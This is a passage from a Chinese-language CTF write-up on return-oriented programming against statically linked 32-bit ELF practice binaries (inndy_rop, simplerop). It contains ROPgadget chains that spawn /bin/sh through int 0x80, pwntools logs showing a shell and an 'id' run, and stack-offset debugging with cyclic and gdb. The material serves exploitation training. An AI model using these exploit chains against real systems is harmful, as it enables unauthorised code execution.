p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0806ecda</span><span class="token punctuation">)</span> <span class="token comment"># pop edx ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x080ea068</span><span class="token punctuation">)</span> <span class="token comment"># @ .data + 8</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x080492d3</span><span class="token punctuation">)</span> <span class="token comment"># xor eax, eax ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0805466b</span><span class="token punctuation">)</span> <span class="token comment"># mov dword ptr [edx], eax ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x080481c9</span><span class="token punctuation">)</span> <span class="token comment"># pop ebx ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x080ea060</span><span class="token punctuation">)</span> <span class="token comment"># @ .data</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x080de769</span><span class="token punctuation">)</span> <span class="token comment"># pop ecx ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x080ea068</span><span class="token punctuation">)</span> <span class="token comment"># @ .data + 8</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0806ecda</span><span class="token punctuation">)</span> <span class="token comment"># pop edx ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x080ea068</span><span class="token punctuation">)</span> <span class="token comment"># @ .data + 8</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x080492d3</span><span class="token punctuation">)</span> <span class="token comment"># xor eax, eax ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0807a66f</span><span class="token punctuation">)</span> <span class="token comment"># inc eax ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0807a66f</span><span class="token punctuation">)</span> <span class="token comment"># inc eax ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0807a66f</span><span class="token punctuation">)</span> <span class="token comment"># inc eax ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0807a66f</span><span class="token punctuation">)</span> <span class="token comment"># inc eax ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0807a66f</span><span class="token punctuation">)</span> <span class="token comment"># inc eax ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0807a66f</span><span class="token punctuation">)</span> <span class="token comment"># inc eax ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0807a66f</span><span class="token punctuation">)</span> <span class="token comment"># inc eax ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0807a66f</span><span class="token punctuation">)</span> <span class="token comment"># inc eax ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0807a66f</span><span class="token punctuation">)</span> <span class="token comment"># inc eax ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0807a66f</span><span class="token punctuation">)</span> <span class="token comment"># inc eax ; retx</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0807a66f</span><span class="token punctuation">)</span> <span class="token comment"># inc eax ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0806c943</span><span class="token punctuation">)</span> <span class="token comment"># int 0x80</span>
io<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span>p<span class="token punctuation">)</span>
io<span class="token punctuation">.</span>interactive<span class="token punctuation">(</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token punctuation">[</span>+<span class="token punctuation">]</span> Starting <span class="token builtin class-name">local</span> process <span class="token string">'/home/m1nus/elf/buu/inndy_rop/inndy_rop'</span> <span class="token assign-left variable">argv</span><span class="token operator">=</span><span class="token punctuation">[</span>b<span class="token string">'/home/m1nus/elf/buu/inndy_rop/inndy_rop'</span><span class="token punctuation">]</span> <span class="token builtin class-name">:</span> pid <span class="token number">12744</span>
<span class="token punctuation">[</span>DEBUG<span class="token punctuation">]</span> Sent 0x95 bytes:
    00000000  <span class="token number">61</span> <span class="token number">61</span> <span class="token number">61</span> <span class="token number">61</span>  <span class="token number">61</span> <span class="token number">61</span> <span class="token number">61</span> <span class="token number">61</span>  <span class="token number">61</span> <span class="token number">61</span> <span class="token number">61</span> <span class="token number">61</span>  <span class="token number">61</span> <span class="token number">61</span> <span class="token number">61</span> <span class="token number">61</span>  │aaaa│aaaa│aaaa│aaaa│
    00000010  da ec 06 08  <span class="token number">60</span> a0 0e 08  <span class="token number">16</span> <span class="token number">80</span> 0b 08  2f <span class="token number">62</span> <span class="token number">69</span> 6e  │····│<span class="token variable"><span class="token variable">`</span>···│····│/bin│
    00000020  6b <span class="token number">46</span> 05 08  da ec 06 08  <span class="token number">64</span> a0 0e 08  <span class="token number">16</span> <span class="token number">80</span> 0b 08  │kF··│····│d···│····│
    00000030  2f 2f <span class="token number">73</span> <span class="token number">68</span>  6b <span class="token number">46</span> 05 08  da ec 06 08  <span class="token number">68</span> a0 0e 08  │//sh│kF··│····│h···│
    00000040  d3 <span class="token number">92</span> 04 08  6b <span class="token number">46</span> 05 08  c9 <span class="token number">81</span> 04 08  <span class="token number">60</span> a0 0e 08  │····│kF··│····│<span class="token variable">`</span></span>···│
    00000050  <span class="token number">69</span> e7 0d 08  <span class="token number">68</span> a0 0e 08  da ec 06 08  <span class="token number">68</span> a0 0e 08  │i···│h···│····│h···│
    00000060  d3 <span class="token number">92</span> 04 08  6f a6 07 08  6f a6 07 08  6f a6 07 08  │····│o···│o···│o···│
    00000070  6f a6 07 08  6f a6 07 08  6f a6 07 08  6f a6 07 08  │o···│o···│o···│o···│
    *
    00000090  <span class="token number">43</span> c9 06 08  0a                                     │C···│·│
    00000095
<span class="token punctuation">[</span>*<span class="token punctuation">]</span> Switching to interactive mode
$ <span class="token function">id</span>
<span class="token punctuation">[</span>DEBUG<span class="token punctuation">]</span> Sent 0x3 bytes:
    b<span class="token string">'id\n'</span>
<span class="token punctuation">[</span>DEBUG<span class="token punctuation">]</span> Received 0x87 bytes:
    b<span class="token string">'uid=1000(m1nus) gid=1000(m1nus) groups=1000(m1nus),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),131(lxd),132(sambashare)\n'</span>
<span class="token assign-left variable">uid</span><span class="token operator">=</span><span class="token number">1000</span><span class="token punctuation">(</span>m1nus<span class="token punctuation">)</span> <span class="token assign-left variable">gid</span><span class="token operator">=</span><span class="token number">1000</span><span class="token punctuation">(</span>m1nus<span class="token punctuation">)</span> <span class="token assign-left variable">groups</span><span class="token operator">=</span><span class="token number">1000</span><span class="token punctuation">(</span>m1nus<span class="token punctuation">)</span>,4<span class="token punctuation">(</span>adm<span class="token punctuation">)</span>,24<span class="token punctuation">(</span>cdrom<span class="token punctuation">)</span>,27<span class="token punctuation">(</span>sudo<span class="token punctuation">)</span>,30<span class="token punctuation">(</span>dip<span class="token punctuation">)</span>,46<span class="token punctuation">(</span>plugdev<span class="token punctuation">)</span>,120<span class="token punctuation">(</span>lpadmin<span class="token punctuation">)</span>,131<span class="token punctuation">(</span>lxd<span class="token punctuation">)</span>,132<span class="token punctuation">(</span>sambashare<span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p><s>由于实在是比较懒，没有截图，直接复制的bash的内容</s></p>
<p>当然，ROPgadget也不是万能的，像angr需要我们添加适当的约束条件一样，针对<code>statically linked</code>的程序构造的ropchain都可以打通，需要我们根据程序人为的修改下，或者另寻他法。比如我们来看下这道题</p>
<h5><span id="example-simplerop">Example-simplerop</span></h5>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">m1nus@ubuntu:~/elf/buu/simplerop$ <span class="token function">file</span> simplerop 
simplerop: ELF <span class="token number">32</span>-bit LSB executable, Intel <span class="token number">80386</span>, version <span class="token number">1</span> <span class="token punctuation">(</span>GNU/Linux<span class="token punctuation">)</span>, statically linked, <span class="token keyword">for</span> GNU/Linux <span class="token number">2.6</span>.24, BuildID<span class="token punctuation">[</span>sha1<span class="token punctuation">]</span><span class="token operator">=</span>bdd40d725b490b97d5a25857a6273870c7de399f, not stripped<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">ROP is easy is'nt it ?
Your input <span class="token builtin class-name">:</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<p>程序运行后接收一次用户的输入，然后结束</p>
<h6><span id="main">main()</span></h6>
<pre class="line-numbers language-c" data-language="c"><code class="language-c"><span class="token keyword">int</span> __cdecl <span class="token function">main</span><span class="token punctuation">(</span><span class="token keyword">int</span> argc<span class="token punctuation">,</span> <span class="token keyword">const</span> <span class="token keyword">char</span> <span class="token operator">*</span><span class="token operator">*</span>argv<span class="token punctuation">,</span> <span class="token keyword">const</span> <span class="token keyword">char</span> <span class="token operator">*</span><span class="token operator">*</span>envp<span class="token punctuation">)</span>
<span class="token punctuation">&#123;</span>
  <span class="token keyword">int</span> v4<span class="token punctuation">;</span> <span class="token comment">// [esp+1Ch] [ebp-14h] BYREF</span>

  <span class="token function">puts</span><span class="token punctuation">(</span><span class="token string">"ROP is easy is'nt it ?"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token function">printf</span><span class="token punctuation">(</span><span class="token string">"Your input :"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token function">fflush</span><span class="token punctuation">(</span><span class="token constant">stdout</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token keyword">return</span> <span class="token function">read</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">,</span> <span class="token operator">&amp;</span>v4<span class="token punctuation">,</span> <span class="token number">100</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>这里通过read()来接收用户的输入，单从源码来看的话，这里v4的长度是0x14，而接受的长度是100，也就是0x64，stackoverflow了</p>
<p>静态链接那么我们首先还是尝试下<code>ROPgadget</code></p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token comment">#ROPgadget --binary simplerop  --ropchain</span>
<span class="token keyword">from</span> struct <span class="token keyword">import</span> pack

<span class="token comment"># Padding goes here</span>
p <span class="token operator">=</span> <span class="token string">b''</span>

p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0806e82a</span><span class="token punctuation">)</span> <span class="token comment"># pop edx ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x080ea060</span><span class="token punctuation">)</span> <span class="token comment"># @ .data</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x080bae06</span><span class="token punctuation">)</span> <span class="token comment"># pop eax ; ret</span>
p <span class="token operator">+=</span> <span class="token string">b'/bin'</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0809a15d</span><span class="token punctuation">)</span> <span class="token comment"># mov dword ptr [edx], eax ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0806e82a</span><span class="token punctuation">)</span> <span class="token comment"># pop edx ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x080ea064</span><span class="token punctuation">)</span> <span class="token comment"># @ .data + 4</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x080bae06</span><span class="token punctuation">)</span> <span class="token comment"># pop eax ; ret</span>
p <span class="token operator">+=</span> <span class="token string">b'//sh'</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0809a15d</span><span class="token punctuation">)</span> <span class="token comment"># mov dword ptr [edx], eax ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0806e82a</span><span class="token punctuation">)</span> <span class="token comment"># pop edx ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x080ea068</span><span class="token punctuation">)</span> <span class="token comment"># @ .data + 8</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x08054250</span><span class="token punctuation">)</span> <span class="token comment"># xor eax, eax ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0809a15d</span><span class="token punctuation">)</span> <span class="token comment"># mov dword ptr [edx], eax ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x080481c9</span><span class="token punctuation">)</span> <span class="token comment"># pop ebx ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x080ea060</span><span class="token punctuation">)</span> <span class="token comment"># @ .data</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0806e851</span><span class="token punctuation">)</span> <span class="token comment"># pop ecx ; pop ebx ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x080ea068</span><span class="token punctuation">)</span> <span class="token comment"># @ .data + 8</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x080ea060</span><span class="token punctuation">)</span> <span class="token comment"># padding without overwrite ebx</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0806e82a</span><span class="token punctuation">)</span> <span class="token comment"># pop edx ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x080ea068</span><span class="token punctuation">)</span> <span class="token comment"># @ .data + 8</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x08054250</span><span class="token punctuation">)</span> <span class="token comment"># xor eax, eax ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0807b27f</span><span class="token punctuation">)</span> <span class="token comment"># inc eax ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0807b27f</span><span class="token punctuation">)</span> <span class="token comment"># inc eax ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0807b27f</span><span class="token punctuation">)</span> <span class="token comment"># inc eax ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0807b27f</span><span class="token punctuation">)</span> <span class="token comment"># inc eax ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0807b27f</span><span class="token punctuation">)</span> <span class="token comment"># inc eax ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0807b27f</span><span class="token punctuation">)</span> <span class="token comment"># inc eax ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0807b27f</span><span class="token punctuation">)</span> <span class="token comment"># inc eax ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0807b27f</span><span class="token punctuation">)</span> <span class="token comment"># inc eax ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0807b27f</span><span class="token punctuation">)</span> <span class="token comment"># inc eax ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0807b27f</span><span class="token punctuation">)</span> <span class="token comment"># inc eax ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0807b27f</span><span class="token punctuation">)</span> <span class="token comment"># inc eax ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x080493e1</span><span class="token punctuation">)</span> <span class="token comment"># int 0x80</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>添加padding(具体长度后面来计算)构造好ropchain后，发送</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token punctuation">[</span>+<span class="token punctuation">]</span> Starting <span class="token builtin class-name">local</span> process <span class="token string">'/home/m1nus/elf/buu/simplerop/simplerop'</span> <span class="token assign-left variable">argv</span><span class="token operator">=</span><span class="token punctuation">[</span>b<span class="token string">'/home/m1nus/elf/buu/simplerop/simplerop'</span><span class="token punctuation">]</span> <span class="token builtin class-name">:</span> pid <span class="token number">14444</span>
exp.py:9: BytesWarning: Text is not bytes<span class="token punctuation">;</span> assuming ASCII, no guarantees. See https://docs.pwntools.com/<span class="token comment">#bytes</span>
  io.recvuntil<span class="token punctuation">(</span><span class="token string">"Your input :"</span><span class="token punctuation">)</span>
<span class="token punctuation">[</span>DEBUG<span class="token punctuation">]</span> Received 0x23 bytes:
    b<span class="token string">"ROP is easy is'nt it ?<span class="token entity" title="\n">\n</span>"</span>
    b<span class="token string">'Your input :'</span>
<span class="token punctuation">[</span>DEBUG<span class="token punctuation">]</span> Sent 0xa9 bytes:
    00000000  <span class="token number">61</span> <span class="token number">61</span> <span class="token number">61</span> <span class="token number">61</span>  <span class="token number">61</span> <span class="token number">61</span> <span class="token number">61</span> <span class="token number">61</span>  <span class="token number">61</span> <span class="token number">61</span> <span class="token number">61</span> <span class="token number">61</span>  <span class="token number">61</span> <span class="token number">61</span> <span class="token number">61</span> <span class="token number">61</span>  │aaaa│aaaa│aaaa│aaaa│
    *
    00000020  2a e8 06 08  <span class="token number">60</span> a0 0e 08  06 ae 0b 08  2f <span class="token number">62</span> <span class="token number">69</span> 6e  │*···│<span class="token variable"><span class="token variable">`</span>···│····│/bin│
    00000030  5d a1 09 08  2a e8 06 08  <span class="token number">64</span> a0 0e 08  06 ae 0b 08  │<span class="token punctuation">]</span>···│*···│d···│····│
    00000040  2f 2f <span class="token number">73</span> <span class="token number">68</span>  5d a1 09 08  2a e8 06 08  <span class="token number">68</span> a0 0e 08  │//sh│<span class="token punctuation">]</span>···│*···│h···│
    00000050  <span class="token number">50</span> <span class="token number">42</span> 05 08  5d a1 09 08  c9 <span class="token number">81</span> 04 08  <span class="token number">60</span> a0 0e 08  │PB··│<span class="token punctuation">]</span>···│····│<span class="token variable">`</span></span>···│
    00000060  <span class="token number">51</span> e8 06 08  <span class="token number">68</span> a0 0e 08  <span class="token number">60</span> a0 0e 08  2a e8 06 08  │Q···│h···│`···│*···│
    00000070  <span class="token number">68</span> a0 0e 08  <span class="token number">50</span> <span class="token number">42</span> 05 08  7f b2 07 08  7f b2 07 08  │h···│PB··│····│····│
    00000080  7f b2 07 08  7f b2 07 08  7f b2 07 08  7f b2 07 08  │····│····│····│····│
    *
    000000a0  7f b2 07 08  e1 <span class="token number">93</span> 04 08  0a                        │····│····│·│
    000000a9
<span class="token punctuation">[</span>*<span class="token punctuation">]</span> Switching to interactive mode
<span class="token punctuation">[</span>*<span class="token punctuation">]</span> Got EOF <span class="token keyword">while</span> reading <span class="token keyword">in</span> interactive
$  
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>本地EOF</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token punctuation">[</span>+<span class="token punctuation">]</span> Opening connection to node4.buuoj.cn on port <span class="token number">27544</span>: Done
exp.py:9: BytesWarning: Text is not bytes<span class="token punctuation">;</span> assuming ASCII, no guarantees. See https://docs.pwntools.com/<span class="token comment">#bytes</span>
  io.recvuntil<span class="token punctuation">(</span><span class="token string">"Your input :"</span><span class="token punctuation">)</span>
<span class="token punctuation">[</span>DEBUG<span class="token punctuation">]</span> Received 0x23 bytes:
    b<span class="token string">"ROP is easy is'nt it ?<span class="token entity" title="\n">\n</span>"</span>
    b<span class="token string">'Your input :'</span>
<span class="token punctuation">[</span>DEBUG<span class="token punctuation">]</span> Sent 0xa9 bytes:
    00000000  <span class="token number">61</span> <span class="token number">61</span> <span class="token number">61</span> <span class="token number">61</span>  <span class="token number">61</span> <span class="token number">61</span> <span class="token number">61</span> <span class="token number">61</span>  <span class="token number">61</span> <span class="token number">61</span> <span class="token number">61</span> <span class="token number">61</span>  <span class="token number">61</span> <span class="token number">61</span> <span class="token number">61</span> <span class="token number">61</span>  │aaaa│aaaa│aaaa│aaaa│
    *
    00000020  2a e8 06 08  <span class="token number">60</span> a0 0e 08  06 ae 0b 08  2f <span class="token number">62</span> <span class="token number">69</span> 6e  │*···│<span class="token variable"><span class="token variable">`</span>···│····│/bin│
    00000030  5d a1 09 08  2a e8 06 08  <span class="token number">64</span> a0 0e 08  06 ae 0b 08  │<span class="token punctuation">]</span>···│*···│d···│····│
    00000040  2f 2f <span class="token number">73</span> <span class="token number">68</span>  5d a1 09 08  2a e8 06 08  <span class="token number">68</span> a0 0e 08  │//sh│<span class="token punctuation">]</span>···│*···│h···│
    00000050  <span class="token number">50</span> <span class="token number">42</span> 05 08  5d a1 09 08  c9 <span class="token number">81</span> 04 08  <span class="token number">60</span> a0 0e 08  │PB··│<span class="token punctuation">]</span>···│····│<span class="token variable">`</span></span>···│
    00000060  <span class="token number">51</span> e8 06 08  <span class="token number">68</span> a0 0e 08  <span class="token number">60</span> a0 0e 08  2a e8 06 08  │Q···│h···│`···│*···│
    00000070  <span class="token number">68</span> a0 0e 08  <span class="token number">50</span> <span class="token number">42</span> 05 08  7f b2 07 08  7f b2 07 08  │h···│PB··│····│····│
    00000080  7f b2 07 08  7f b2 07 08  7f b2 07 08  7f b2 07 08  │····│····│····│····│
    *
    000000a0  7f b2 07 08  e1 <span class="token number">93</span> 04 08  0a                        │····│····│·│
    000000a9
<span class="token punctuation">[</span>*<span class="token punctuation">]</span> Switching to interactive mode
<span class="token punctuation">[</span>DEBUG<span class="token punctuation">]</span> Received 0x2b bytes:
    b<span class="token string">'timeout: the monitored command dumped core\n'</span>
timeout: the monitored <span class="token builtin class-name">command</span> dumped core
<span class="token punctuation">[</span>*<span class="token punctuation">]</span> Got EOF <span class="token keyword">while</span> reading <span class="token keyword">in</span> interactive
$  
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>远程timeout</p>
<p>很显然，这个方法就行不通了</p>
<p>这道题程序没有got表，无法泄露函数的地址，没有<code>system</code>，没有<code>/bin/sh</code></p>
<p>都没办法了试下系统调用呢，如果是需要用到系统调用就需要一个比较核心的指令——<code>int 0x80</code></p>
<p>我们可以先通过ROPgadget来搜索看看，程序里有没有</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">m1nus@ubuntu:~/elf/buu/simplerop$ ROPgadget <span class="token parameter variable">--binary</span> simplerop <span class="token parameter variable">--only</span> <span class="token string">"int"</span>
Gadgets information
<span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span>
0x080493e1 <span class="token builtin class-name">:</span> int 0x80

Unique gadgets found: <span class="token number">1</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>发现有<code>int 0x80</code>，那后面就好构造了</p>
<p>我们需要<code>int80(11 , '/bin/sh' , null , null)</code>，相当于执行的是<code>execve('/bin/sh' , 0 , 0)</code>，从而拿到shell</p>
<p>程序也没有<code>/bin/sh</code>，需要我们读入，这里可以用read，下面开始构造payload</p>
<p>首先是padding部分，上文说到从源码，包括IDA的栈试图来看<code>v2</code>都是0x14的大小，加上<code>0x8</code>就是<code>0x1c</code>，但是实际上会发现打不通，我们通过gdb+cyclic来看</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">m1nus@ubuntu:~/elf/buu/simplerop$ cyclic <span class="token number">200</span>
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<p>先生成200个数据，然后gdb让程序run起来，c到等待用户输入的地方，将200个数据复制进去</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">Program received signal SIGSEGV, Segmentation fault.
0x61616169 <span class="token keyword">in</span> ?? <span class="token punctuation">(</span><span class="token punctuation">)</span>
LEGEND: STACK <span class="token operator">|</span> HEAP <span class="token operator">|</span> CODE <span class="token operator">|</span> DATA <span class="token operator">|</span> RWX <span class="token operator">|</span> RODATA
